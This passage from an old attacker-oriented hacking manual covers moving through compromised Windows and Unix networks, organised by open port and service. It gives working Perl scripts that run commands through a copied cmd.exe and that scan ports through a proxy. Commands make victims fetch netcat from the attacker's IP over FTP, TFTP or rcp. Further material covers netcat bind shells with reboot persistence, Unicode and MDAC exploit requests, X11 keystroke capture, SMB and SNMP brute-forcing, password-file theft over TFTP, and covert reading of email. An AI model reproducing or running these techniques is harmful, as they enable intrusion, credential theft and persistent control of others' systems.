servers together, reaching deep within a network. If we assume that the
server on 169.xxx.201.4 is exploitable via the MDAC bug, exploiting the
server would be as simple as:
perl rfpnew.pl -h <target> -p 53 -C '<whatever>'
By simply modifying the convert.pl script mentioned earlier to point to port
53, we can start to build the upload page on the internal server, and the cycle continues. If you struggle to keep track on what server you are
working don't despair, it happens.

Port 80 and port 139 open.

In this situation, let us assume that port 80 is open but no exploitable
scripts or weaknesses are to be found, but that we have administrator right
via NetBIOS. Uploading a program is trivial - we use NetBIOS. A simple way
to execute a program is to use the NT remote user administration tool and to
elevate the IUSR_machineuser to administrator level. The next step is to
make a copy of cmd.exein the <webroot>../scripts directory and then simply
calling cmd.exewith parameters from a browser. An easy way of doing this
via command line is by using the following PERL script:
#!/usr/bin/perl
use Socket;
if ($#ARGV<1) {die "Usage: execute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$command=@ARGV[1];
print "Executing $command on $host:$port\n";
$command=~s/ /\%20/g;
$target = inet_aton($host);
# ---------------send the command
my @results=sendraw("GET /scripts/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
This script simply executes commands found in the second parameter using the
copied cmd.exe in the scripts directory. With the IUSR_machineuser elevated
to administrator rights, all commands can be executed.

Port 80 open and can execute

Here's where things start to become more interesting. By "and can execute" I
mean that you have some way of executing a command - be that via the Unicode
exploit, an exploitable script, or MDAC. The easy way to get software on the
host is to FTP it. Typically you will have the toolbox situated on your
machine, and the host will FTP it from you. As such you will need an
automated FTP script - you cannot open an FTP session directly as it is
interactive and you probably do not have that functionality. To build an FTP
script execute the following commands:
echo user username_attacker password_attacker > c:\ftp.txt
echo bin >> c:\ftp.txt
echo get tool_eg_nc.exe c:\nc.exe >> c:\ftp.txt
echo quit >> c:\ftp.txt
ftp -n -s:c:\ftp.txt 160.124.19.98
del c:\ftp.txt
Where 160.124.19.98 is your IP number. Remember that you can execute
multiple command by appending a "&"between commands. This script is very
simple and will not be explained in detail as such. There are some problems
with this method though. It makes use of FTP - it might be that active FTP
reverse connections are not allowed into the network - NT has no support for
passive FTP. It might also be that the machine is simply firewalled and it
cannot make connections to the outside. A variation on it is TFTP - much  
easier. It uses UDP and it could be that the firewall allows UDP to travel
within the network. The same it achieved by executing the following on the
host:
tftp -I 160.124.19.98 GET tool_eg_nc.exe c:\nc.exe
As there is no redirection of command it makes it a preferred method for
certain exploits (remember when no one could figure out how to do redirects
with Unicode?). There is yet another way of doing it - this time via rcp
(yes NT does have it):
rcp -b 160.124.19.98.roelof:/tool_eg_nc.exe c:\nc.exe
For this to work you will need to have the victim's machine in your .rhosts
and rshservice running. Remote copy uses TCP, but there is no reverse
connection to be worried about. Above two examples does not use any
authentication - make sure you close your firewall and/or services after the
attack!
In these examples one always assume that the host (victim) may establish
some kind of connection to the attacker's machine. Yet, in some cases the
host cannot do this - due to tight firewalling. Thus - the host cannot
initiate a connection - the only allowed traffic is coming from outside (and
only on selected ports). A tricky situation. Let us assume that we can only
execute a command - via something like the MDACexploit (thus via HTTP(s)).
The only way to upload information is thus via HTTP. We can execute a
command - we can write a file (with redirection). The idea is thus to write
a page - an ASP/HTML page that will facilitate a file upload. This is easier
said then done as most servers needs some server side components in order to
achieve this. We need an ASP-only page, a page that does not need any server
side components. Furthermore we sitting with the problem that most HTML/ASP
pages contains characters that will "break" a file redirection - a ">" for
instance. The command echo <html> >> c:\inetpub\wwwroot\upload.htmwont
work. Luckily there are some escape characters even in good old DOS. We need
a script that will convert all potential "difficult" characters into their
escaped version, and will then execute a "echo" command - appending it all
together to form our page. Such a script (in PERL) looks like this:
#!/usr/local/bin/perl
# usage: convert <file_to_upload> <target>
open(HTMLFILE,@ARGV[0]) || die "Cannot open!\n";
while(<HTMLFILE>) {
s/([<^>])/^$1/g; # Escape using the WinNT ^ escape char
s/([\x0D\x0A])//g; # Filter \r, \n chars
s/\|/\^\|chr\(124\)\|/g; # Convert | chars
s/\"/\^\|chr\(34\)\|/g; # Convert " chars
s/\{/\^\|chr\(123\)\|/g; # Convert { chars
s/\&/\^\|chr\(38\)\|/g; # Convert & chars
system "perl rfpnew.pl -h @ARGV[1] -p 80 -C 'echo $_ >> c:\\@ARGV[0]'\n";
}
close (HTMLFILE);
#Spidermark: SensePostdata
This script (which was butchered from some other PERL script by
Scrippie/Phreak) takes two arguments - the first is the file that needs to
be uploaded, the second the target/victim host's IP number. It makes use of
another script - rfpnew.pl- a hack of the popular MDAC exploit by Rain
Forrest Puppy with extra functionality to specify the port number and to
pass the command to be executed as parameter. The convert script will create
a file with the same filename as the one specified in c:\. It simply reads
every line from the source file, converts all difficult characters and
appends the "converted" line to the file on the target. The PERL script
rfpnew.pl(its a nasty hack - don't you dare look at the code) can be found
on www.sensepost.com/book/rfpnew.pl. It don't list it here only because it
rather large. 
The only part missing here is the actual file that is needed for uploading.
After some searches on the Internet, I got hold of a .ASP & .INC file pair
that neatly facilitates uploading to a server - without any server side
components (credit to those that wrote it - I can not remember where I got
it from). Once these two files are "built" (using above script) and
transferred into the webroot, one can simply point ones browser to the
correct URL and upload a toolbox via HTTP. The files upload.aspand
upload.incis to be found at www.sensepost.com/book/upload.aspand
www.sensepost.com/book/upload.inc(I don't list them here because they are
quite large). Be sure to move the uploaded files to the right spot - keep
them in the same directory, and keep the filenames the same -upload.aspand
upload.inc, unless you want to meddle with the ASP and INC files.
In a nutshell (for the script kids):
•  get upload.asp, upload.incand rfpnew.plfrom the site.
•  cut & paste the converter script to convert.pland put it in the same
directory
•  perl convert upload.asp <target>
•  perl convert upload.inc <target>
•  perl rfpnew.pl -h <target> -p 80 -C 'move c:\upload.asp
<webroot>\upload.asp'
•  perl rfpnew.pl -h <target> -p 80 -C 'move c:\upload.inc
<webroot>\upload.inc.
•  surf to http://target/upload.asp.
•  upload your good stuff
•  inhale/exhale
The next step would be to execute something on the host. With the uploader
in place, the obvious choice would be to upload netcat, and to thus create a
DOS shell. In an environment where the host/target is not tightly firewalled
this is a good idea. Where the host/target only has port 80 (or 443) open it
is not such a good choice. See netcathas to listen on a port and since the
only port open is 80, we can't use it. Technically speaking we can "bump"
off the server and have netcatlistening there, but this would just cause
the administrator to investigate (as the website is now down). Note to keen
developer - build a netcatlike tool that will recognize an HTTP request -
pass it on to the server (listening on another port) and pass other stuff
straight to cmd.exe. In a situation where we cannot use netcat, our "tool"
needs to be command line driven, and needs to be able to either create files
as output, or to output results to standard out - where it can be redirected
to a file. These files could simply be created directly into the webroot -
in this way the attacker can view her results in a webbrowser. One now begin
to understand the merit of command line port scanners (for NT) and things
like windumpthat does not need any registry changes or install shields.
If the host is not tightly firewalled the obvious choice is netcat. Some
default installations of Firewall-1 allows TCP communication to port 53 - it
does makes sense to have netcatlistening on that port in such cases (do a
portscan to make sure... duh):
(after nc.exe has been uploaded in c:\temp and assuming MDAC exploit)
perl rfpnew.pl -h <target> -p 80 -C 'c:\temp\nc.exe -l -p 53 -e cmd.exe'
telnet <target> 53
Trying <target>...
Connected to <target>.
Escape character is '^]'.
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>
The only thing that netcatreally is doing is making it faster and easier to
execute command line commands. Netcatalso helps in situations where one
does not have the luxury of time - such as in the examples where you only 
have NetBIOS access. To ensure that you keep connectivity with the target
you might want to execute a "netcat -L -p 53 -e cmd.exe" sitting in
/winnt/system32/setup.exeas explained (you could execute it from a batch
file and convert the batch file to an EXE). When the host reboots it will be
listening on port 53 for incoming connections. All you need to do is to
probe port 53 continuously.

Port 21 open

With only FTP open you will have a tougher time. If you have administrator
rights you could still copy an executable into the correct directory - see
1, but you will not have the ability to reboot the host - you will have to
wait until someone reboots it. You might want to try a D.O.S attack on the
machine, but usually it will just hang (which is suspect, but will speed up
a manual reboot). If you do not have administrator rights chances are
slimmer - you need to upload a Trojan - again, be very careful what you
upload - most machines nowadays have virus scanners. You could try to wrap
netcat as something that the administrator will be tempted to execute - you
know the drill - pamela.exe or whatever. If you do not make use of a known
Trojan and there is no way for your custom Trojan to let you know that it
was executed you will need some mechanism of checking if the program was
executed - a (local) netcat in a loop with mail notification perhaps?

Onlyport 139 open - administrator rights.

Copy the executable into <drive>:/winnt/system32/, and rename it to
setup.exe. Now you have the choice of waiting for the system to reboot (NT
have a history of doing this every now and again), or you could reboot the
machine remotely. How? With a tool called psshutdown.exe. You can find it at
http://www.sysinternals.com/psshutdown.htm. Note that you need administrator
rights to be able to a) copy the software into the winnt/system32directory
and b) reboot the box remotely. Make sure that your choice of executable is
well thought through - since you have NetBIOS access to the system you might
want to check if there is any anti-virus software installed - if so - do not
try to execute a Trojan such as Subseven/Netbus/BO- it will just screw up.
Stick with netcat(see later). There are other ways to execute something at
startup - with NetBIOS access you could also remotely edit the registry.
If you don't have administrator rights - read the next section - the same
applies here.

Windows

We are faced with two distinct different problems - getting the tools on the
host, and executing it. Getting the tools on the host could be as easy as
FTP-ing it to the host (should a FTP server be running and we have a
username and password - or anonymous FTP). If we have Net BIOS access to the
host we can simply copy the software. If we just have Net BIOS access 
to the host - how do we execute the software? As you can see things are never as
easy as it seems. Let us look at these problems by examining a few
scenarios: (you will need to read all the sections as they really form one
part - I refer to some things that is only contained in other parts)

Now what? (a lot of the stuff in the HTTP/S part is repeated here – you might want to look there as well)

Most books and papers on the matter of hacking always stops at the point
where the attacker has gained access to a system. In real life it is here
where the real problems begin - usually the machine that has been
compromised is located in a DMZ, or even on an offsite network. Another
problem could be that the compromised machine has no probing tools or
utilities and such tools to work on a unknown platform is not always that
easy. This chapter deals with these issues. Here we assume that a host is
already compromised - the attacker have some way of executing a command on
the target - be that inside of a Unix shell, or via a MDACexploit. The
chapter does not deal with rootkitting a host.
Some hosts are better for launching 2nd phase attacks than others -
typically a Linux or FreeBSD host is worth more than a Windows NT webserver.
Remember - the idea is to further penetrate a network. Unfortunately, you
can not always choose which machines are compromised. Before we start to be
platform specific, let us look at things to do when a host is compromised.
The first step is to study one's surroundings. With 1:1NAT and other address
hiding technologies you can never be too sure where you really are. The
following bits of information could help (much of this really common sense,
so I wont be explaining *why* you would want to do it):
1. IP number, mask, gateway and DNS servers (all platforms)
2. Routing tables (all platforms)
3. ARP tables (all platforms)
4. The NetBIOS/Microsoft network - hosts and shares(MS)
5. NFS exports (Unix)
6. Trust relationships - .rhosts, /etc/hosts.allow etc. (Unix)
7. Other machines on the network - /etc/hosts , LMHOSTS (all platforms)
All of the above will help to form an idea of the topology of the rest of
the network - and as we want to penetrate further within the network its
helpful. Let us assume that we have no inside knowledge of the inner network
- that is - we don't know where the internal mailserver is located - we
don't know where the databases are located etc. With no tools on the host
(host as in parasite/host), mapping or penetrating the inner network is
going to take very long. We thus need some way of getting a (limited)
toolbox on the host. As this is quite platform specific, we start by looking
at the more difficult platform - Windows.

NetBIOS/SMB (139 TCP)

SMB is used by Windows machines (and with SAMBA even Unix machines) to
communicate. A lot can be done through an open Net BIOS port. The first thing
is to try to find out what shares are advertised on the server. Some servers
is not configured well and will revealing its shares without a username or
password (using a NULL connection).
>smbclient -L 209.xxx.68.66 -n "just a test"
Password: <cr>
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 2.0.3]
Share name Type Comment
--------- ---- -------
winshares Disk FreeBSD Samba Server
IPC$ IPC IPC Service (Samba 2.0.3)
Server Comment
--------- -------
FILES Samba 2.0.3
Workgroup Master
--------- ------- 
WORKGROUP FILES
(Note the -nswitch - we don't want to call the server with our server name,
just in case you are running SAMBA yourself) As you can see we find some
lovely information on the server - the workgroup/domain name, the
description and the Windows version (above server was a SAMBA server
actually). Nice...Of course with a known password, or a blank password
things are much more fun- you can list all the shares or you might want to
access a drive:
> smbclient \\\\208.xxx.198.71\\c$ -U administrator -n "justatest"
Password: <blank..duh!>
Domain=[xxx] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> ls
WINNT D 0 Fri Oct 8 23:24:02 1999
NTDETECT.COM AHSR 26816 Fri Aug 11 01:22:24 2000
ntldr AHSR 156496 Fri Aug 11 01:22:24 2000
boot.ini ASR 288 Sat Oct 9 00:30:56 1999
ffastun.ffo AH 208896 Fri Dec 29 00:35:34 2000
Program Files D 0 Fri Oct 8 23:28:10 1999
CONFIG.SYS A 0 Fri Oct 8 23:31:46 1999
AUTOEXEC.BAT A 0 Fri Oct 8 23:31:46 1999
IO.SYS AHSR 0 Fri Oct 8 23:31:46 1999
MSDOS.SYS AHSR 0 Fri Oct 8 23:31:46 1999
TEMP D 0 Fri Oct 8 23:31:50 1999
--cut--
You are now dropped into the smbclient"shell". From here you could do file
transfers and the likes (see Chapter 6 - what now). You should really be
able to figure out how "smbclient" works on your own...
You might also want to try to collect information with the "nmblookup"
command - it helps sometimes to find the administrator username (if it was
changed):
# nmblookup -A 160.124.19.99
Looking up status of 160.124.19.99
received 10 names
HUTSI <00> - B <ACTIVE>
SENSEPOST <00> - <GROUP> B <ACTIVE>
HUTSI <20> - B <ACTIVE>
HUTSI <03> - B <ACTIVE>
SENSEPOST <1e> - <GROUP> B <ACTIVE>
SENSEPOST <1d> - B <ACTIVE>
INet~Services <1c> - <GROUP> B <ACTIVE>
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
IS~HUTSI <00> - B <ACTIVE>
BAAS <03> - B <ACTIVE>
Look at the entries marked <03>. Note "BAAS". "Baas" is the renamed
administrator username. So, forget trying using "administrator" as a
username.
You also want to have a look at VLAD(yet again). The pwscan.plscript does
a good job of brute forcing NetBIOS (run it with switches -vand -B). The
pwscan.plscript actually uses the "smbclient" command and inspects the
output to find a valid username & password combination. If you want to brute
a specific share, you will need to modify these lines (starting at line 610
in version 1.17):
$cmd = "smbclient";
$service = "//".$target."/ipc\$";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
to read something like 
$cmd = "smbclient";
$service = "//".$target."/sharename";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
An excellent paper on NetBIOS and the CIFS protocol by Hobbit can be found
at http://packetstorm.securify.com/docs/infosec/cifs.txt. You really should
try to read it.
Added: you should reallylook at a tool called CIS by David Litchfield
(nowadays with @stake) It does a lot of cool stuff – and it does wonders for
SMB.

R-services (rshell, rlogin) (513,514 TCP)

The R-services has used in the good old days of (campus) wide open Unix
clusters of machines. It was used to hop from one server to the next with as
little as possible effort - it's almost the same as telnet or SSH - it gives
you a shell (or executing a command). Nowadays it is not very common to find
Unix servers with r login or r shell ports open. R shell is basically an
extension of r login- R shell will execute a command after logging in with
the username and password specified. For the purposes of this document we
can see r loginand rs has the same. These two services are protected by the
".rhosts" file(s). These files reside in a user directory and contain the IP
numbers (or DNS names) and usernames on the remote machines that could
assume control on the local machine.
But heck - I am not here to explain how rloginand rshworks - the only
thing that needs to be said here is that you could also try to get into a
machine using it. It works much the same as telnet - all the same principles
apply- try getting usernames etc. Sometimes rloginis used in conjunction
with other tricks - if you can get a "+ +" (allow anyone from anywhere) in
the .rhostfile you are made - see the X11 section.

X11 (6000 TCP)

X11 displays are (normally) protected on a network level - that is - there
are no usernames and passwords involved. The display is actually a server
and it listens on port 6000 (TCP). Control for clients to connect to the
server is facilitated with the "xhost" command. By default it is set up in a
way that nobody can connect to the display - default deny. As soon as
programs are sharing the display (exporting an xtermto your display from
another host or whatever) the user of the display have to add the IP number
or DNS name of the client that wish to connect by running the command "xhost
+<client>". In theory this works perfectly nice, but in the real world
people tend to just enter "xhost +" which allows anyone to connect to the
display.
A host that is open for anyone to connect to the display is risking a lot,
and could possibly be compromised. There are a few nice things to do when
you find an open X11 display. One of the most common attacks is to capture
all the keystrokes that is entered on the victim's host. The program "xkey"
(available from www.hack.co.za) does this very neatly:
> xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<<Shift_R>>P 196.37.xxx.1
weirdshitometer
Its clear why we are excited about key captures. A open X11 display can also
be "copied" - the root window (the main window) can be copied, and
displayed. Each window have a unique ID - you can specify which window you
want to copy, but for a start let us get the root window:
> xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
> xv /tmp/screendump
We are using xvto display the screen - xvcan read the xwdformat straight
off. The screen might include some interesting data - if you get a
screensaver - bad luck - use fingerto see when someone is active. To get a
list of windows that are open on the display you might want to issue the
command:
> xwininfo -display <victim> -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227
+536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks"
"Netscape") 872x622+10+10 +10+10 
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see
the other screen listed (you won't see it with xwd). With a bit of luck you
get a Netscape browser open. To get Netscape open on an open X11 display is
very good news as you can remotely control Netscape. Fancy telling Netscape
to open /etc/passwdand doing another screen capture? Here is how :
> netscape -display <victim> -remote 'openFile(/etc/passwd)'
> xwd -display <victim> -root -silent -out /tmp/netscape_
> xv /tmp/netscape
You can even tell Netscape to write files. It won't work trying to overwrite
files - you will find a nasty Netscape popup, but you can write files that
do not exist. You could create a page with "+ +"on it, redirect the browser
to the page, and, if Netscape is running as root, save it to /.rhosts. Be
sure to have a close look at http://home.netscape.com/newsref/std/x-remote.htmlif you find an open X11 running Netscape.
In theory you could also send keystrokes to an open X display. I found the
program "xpusher.c" at http://www.hack.co.za, fiddled around with it, but it
does not seem to work. There might be other programs around. Keep looking...

Proxies (80,1080,3128,8080 TCP)

A proxy is used to relay HTTP and HTTPs connection - if you don't know what
a proxy is you should not be reading any of this. If we find a proxy port
open on a host it excites us because it could be used to access other
web servers that are located behind a firewall if not configured correctly.
Just in the same way that your proxy server allows you to connect to it and
surf sites that are located on the outside of your server, a victim's proxy
server could serve as a gateway to reach machines that are normally not
accessible. As example - a firewall is protecting the 196.xxx.201.0/24
network. The intranet server is located on 196.xxx.201.10, but the firewall
prohibits communication to port 80 (or 443). Port 3128 on 196.xxx.201.5 is
open, and the Squid proxy is not set up correctly (it allows anyone to
connect to it). Change your proxy properties in your local browser to point
to 196.xxx.201.5 and hit 196.xxx.201.10 and access the intranet server.
You can even run an exploit over a proxy. The only difference in reaching
the machine direct and via a proxy is that the full URL needs to be send,
e.g.:
Without proxy (for example Unicode exploit):
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
With proxy:
GET http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
You will need to make some changes to your exploit's code, but generally it
wouldn't need to be difficult. Remember to point your exploit to the proxy
address and port!
You could even use a proxy as a very primitive portscanner. By requesting a
URL on a different port - say GET http://victim:port/ HTTP/1.0 you might get
a different response. Some proxies - such as Squid- does not even try to
pass traffic with a destination port lower then 1024 (other than 70,80, and
443). Traffic directed to ports higher than 1024 is allowed - by
interpreting responses from the proxy we can find out if the port is open or
closed. Hereby a simple PERL script that works OK with Squid:
---proxyscan.pl---
#!/usr/bin/perl
use Socket;
if ($#ARGV<0) {die "Usage: proxyscan.pl proxyIP:port:scanIP:beginrange:endrange
($host,$port,$scanIP,$br,$er)=split(/:/,@ARGV[0]);
print "Testing $scanIP via $host:$port:\n";
$target = inet_aton($host);
for ($mp=$br; $mp <= $er; $mp++) {
my @results=sendraw("GET http://$scanIP:$mp/ HTTP/1.0\r\n\r\n");
#system "sleep 2";
foreach $line (@results){
if ($line =~ /refused/) {print "Port $mp on $scanIP is closed\n"}
if ($line =~ /Zero/) {print "Port $mp on $scanIP is open\n"}
}
}
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
> perl proxyscan.pl 160.124.19.103:3128:160.124.19.98:5999:6002
Testing 160.124.19.98 via 160.124.19.103:3128:
Port 5999 on 160.124.19.98 is closed  
Port 6000 on 160.124.19.98 is open
Port 6001 on 160.124.19.98 is closed
Port 6002 on 160.124.19.98 is closed
It might be that you want to change some things in this code - I have seen
that when the server does not close the connection (the port is open and
there is something listening on the other side, but no data is send) the
script hangs around for a real long time. This is due to Squidnot closing
the connection after a while, and I don't see a quick workaround for it (and
I am way too lazy for investigate it). It does work fine...provided you have
some time to kill. See also the section on network level attacks for >1024
destination port tricks.
Apparently proxy servers can also be used to send email anonymously but I
can't get any good examples of this.

SNMP(161 UDP)

SNMP is short for Simple Network Management Protocol and it does just that -
it is used to monitor and manage hosts and routers. The majority of users of
SNMP use it to monitor routers - to show bandwidth utilization and to send
messages to the SNMP monitoring station when a link goes down. The most
common SNMP monitoring software is HP Openview. Attackers use SNMP for
discovering networks and possibly to change or disrupt networking. SNMP on
host (especially NT workstations) are fun - it reveals a lot of interesting
information.
SNMP uses a community name for access control - if you don't have the right
community name you cannot get information from the host or router. The
easiest way of checking a valid community name is using the snmpwalkcommand
(it is bundled with the ucd-snmppackage):
> snmpwalk 196.35.xxx.79 xmax
system.sysDescr.0 = Cisco Internetwork Operating System Software
IOS (tm) 3000 Software (CPA25-CG-L), Version 11.0(6), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1996 by cisco Systems, Inc.
Compiled Thu 21-Mar-96 00:29 by hochan
system.sysObjectID.0 = OID: enterprises.9.1.57
---blah blah---
One can see in the above example that a valid community name is "xmax".
There are actually two sorts of community string - a "read" string and a
"write" string. With the write string you would be able to change
information on the host or the router - such as routing tables, IP addresses
assigned to interfaces etc. - with a "read" string you can only get the
information. SNMP uses UDP so make sure you allow UDP to enter your network.
Just like usernames and passwords, community names can also be brute forced.
Again we make use of VLAD's pwscan.plPERL script. Populate the
"community.db" file and let rip:
perl pwscan.pl -v -M 196.35.xxx.79
Did I mention that you could use pwscan.plto scan more than one IP number,
using simple scripting?
> cat > toscanips.txt
196.34.121.1
196.7.18.120
160.124.19.98
^D
> cat > goscan
#!/bin/tcsh
foreach a (`cat toscanips.txt`)
echo working on $a ...
perl pwscan.pl -v -M $a
continue
end
^D
> chmod u+x goscan
> ./goscan
working on 196.34.121.1 ...
--blah blah--
Real easy eh? A Windows program that will provide an excellent "viewer" for
SNMP information is Solarwind's IP browser(get it at
http://www.solarwinds.net/) - it will try to perform a SNMP walk of all
pingable machines in a network. It is not a freeware application, but it's
really good. Another nice feature is that you can supply your own community
strings, and can edit the information if the string allows you to update
information - e.g. a "write" string.

POP3 (110 TCP)

POP3 must be one of the most common protocols found on the Internet today -
POP3 is used to download email. Some time ago the QPOPserver was
exploitable. As is the case with FTP, one has to have a mechanism for
finding vulnerable versions of POP3 servers. The PERL script used in the FTP
section is just as applicable to the POP3 servers as to the FTP servers.
Some exploits require that you supply a valid username and password - some
require nothing.
A POP3 server can be used to verify a user's password, and therefor can be
used to do a brute force attack on a username and password. Some of the
older POP3 servers also only logged the first incorrect attempt - you could
try as any combinations with only one entry in the logfile. The "pwscan.pl"
script that forms part of VLADhas the possibility to brute force POP3
passwords - it is so easy that I am not going to spend more time on it (see
the telnet section).
Another use for POP3 is to access other people's email without their
knowledge. To be able to do this you will obviously need the correct
password. The advantage is that most POP3 clients can be set to keep the
mail on the server - to thus make a copy of the mail. When the legit user
will connect the mail will still be there.

SSH (22 TCP)

There are a lot of people of there than think their SSL - enabled website is
not vulnerable to the common exploits found. They think - we have security
on our site - it's safe. This is a very twisted view. The same is true for
SSH. The default SSH installation of SSH (using a username and password to
authenticate) only provides you with an encrypted control session. Anyone
out there can still brute force it - a weak password (see telnet) is just as
a problem with SSH as with telnet. The advantage of using SSH is that your
control session is encrypted - this means that it would be very difficult
for someone to see what you are doing. The other nice thing about using SSH
and not telnet is that a SSH session cannot be hijacked. There are some
theories of a SSH insertion attack, but I have not seen this work in the
real world.
SSH can also be used for tunneling other data over the SSH channel. This is
very sweet and there's many interesting tricks - running PPP over SSH,
running Z-modem transfers over SSH etc. But we are here for breaking not
building eh?

TFTP (69 UDP)

TFTP is your friend. TFTP does not require any authentication - it is
usually used for network equipment to get their configurations at boot time.
A router can be set up to TFTP to a Unix/Windows box and get its config from
this box. TFTP makes use of the UDP protocol - and is as such
connectionless.
Normally a TFTP server will allow the attacker to transfer any file to
him/her (/etc/shadow might be a start). The more recent version of the
server will restrict you to only access files that are readable by everyone,
and you might find yourself "jailed" in a directory - like with FTP. The
other restriction on the more recent servers is that the only files that can
be written are those that already exists and that are writeble by everyone.
The other difference between TFTP and FTP is that you need to know what file
you want - there is no "ls" command, but then again, you can make some
intelligent choices.
Let us look at an example (this is really easy, but what the heck). First I
use nmapto find a machine out there with an open TFTP port. Note that for
this scan (a UDP scan) you'll need to allow UDP (duh) and ICMP to enter your
network, as nmaplooks at ICMP port unreachable messages to determine if the
port is open.
# nmap -+output
n -sU -iR -p 69
>tftp
tftp> connect 129.xxx.121.46
> get /etc/password /tmp/passwd
tftp> get /etc/passwd /tmp/passwd
Received 679 bytes in 1.9 seconds
tftp> q
/> more /tmp/passwd 
root:*:0:0:System Administrator:/root:/usr/contrib/bin/bash
daemon:*:1:1:System Daemon:/:/sbin/nologin
sys:*:2:2:Operating System:/tmp:/sbin/nologin
bin:*:3:7:BSDI Software:/usr/bsdi:/sbin/nologin
operator:*:5:5:System Operator:/usr/opr:/sbin/nologin
uucp:*:6:6:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucico
games:*:7:13:Games Pseudo-user:/usr/games:/sbin/nologin
news:*:9:8:USENET News,,,:/var/news/etc:/sbin/nologin
demo:*:10:13:Demo User:/usr/demo:/sbin/nologin
www:*:51:84:WWW-server:/var/www:/sbin/nologin
nobody:*:32767:32766:Unprivileged user:/nonexistent:/sbin/nologin
nonroot:*:65534:32766:Non-root root user for NFS:/nonexistent:/sbin/nologin
Note - I transfer the /etc/passwdfile to the temp directory. If you do the
TFTP as root, and you are not careful, you will overwrite your own
/etc/password file :). We have password file - it is shadowed - but we can
now easily get any other file (the real password file etc.).

RPC & portmapper (111 TCP + other UDP)

The port mapper service works like this - I would connect to the port mapper
port and state that I want to use a specific RPC service - the port mapper
would then reply and tell me which port to use. (RPC is for remote procedure
call - it's like executing a function on a remote machine, and getting the
output back). The reverse is also true - if I want to write a RPC service, I
must register it with the port mapper, so that the client that wants the
service knows on what port I am listening. So what is the bottom line?
I could save myself a lot of port scanning trouble and just ask the
port mapper what services are running on which ports. Now obviously the
por tmapper service itself must be running. So I might be testing for
machines that have port 111 open first. Assuming that I now have a machine
with an open port mapper port the following is done:
> r pc info -p 210.xxx.96.151
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100001 1 udp 1038 rstatd
100001 2 udp 1038 rstatd
100001 3 udp 1038 rstatd
100002 1 udp 1040 rusersd
100002 2 udp 1040 rusersd
100008 1 udp 1042 walld
100012 1 udp 1044 sprayd
150001 1 udp 1046 pcnfsd 
150001 2 udp 1046 pcnfsd
100083 1 tcp 1026 ttdbserver
100068 2 udp 1048 cmsd
100068 3 udp 1048 cmsd
100068 4 udp 1048 cmsd
100068 5 udp 1048 cmsd
100003 2 udp 2049 nfs
100005 1 udp 785 mountd
100005 1 tcp 787 mountd
100024 1 udp 989 status
100024 1 tcp 991 status
100021 1 tcp 840 nlockmgr
100021 1 udp 842 nlockmgr
100021 3 tcp 845 nlockmgr
100021 3 udp 847 nlockmgr
100020 1 udp 850 llockmgr
100020 1 tcp 852 llockmgr
100021 2 tcp 855 nlockmgr
1342177279 3 tcp 1067
1342177279 1 tcp 1067
From this we can which RPC services the host is running. A very interesting
service see running is NFS (network file system). Maybe the host is
exporting some interesting NFS "shares"? Let us have a look:
> showmount -a 210.xxx.96.151
All mount points on 210.xxx.96.151:
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
We can see that this host is only export the shares to specific machines (in
Taiwan) - not to the rest of the world - so it is pretty useless to even try
to mount these "shares" on our host. Maybe I'll look for a host with some
public shares, and then we'll look at mounting those. OK...here goes:
> showmount -e 128.xxx.135.52
Exports list on 128.xxx.135.52:
/install_2.6 Everyone
/export/install Everyone
/psrc rcd_hosts
/usr/share/opt rcd_hosts xxx.edu
/usr/share/opt2.5 rcd_hosts
/scratch7 rcd_hosts
/pucc rcd_hosts xxx.edu
/home/helios/u52 rcd_all
/home/helios/u51 rcd_all
# mount_nfs 128.xxx.135.52:/export/install /mnt
# cd /mnt
# ls
Let us move on to some of the other services. One of the other services that
you would notice is "rusers". Rusersis the same as finger - there ain't
that many tricks with rusers, but it would give you a list of users active
on the host. It very useful when the finger service is not running, or when
it is blocked, and you need some usernames.
> rusers -al 210.xxx.96.151
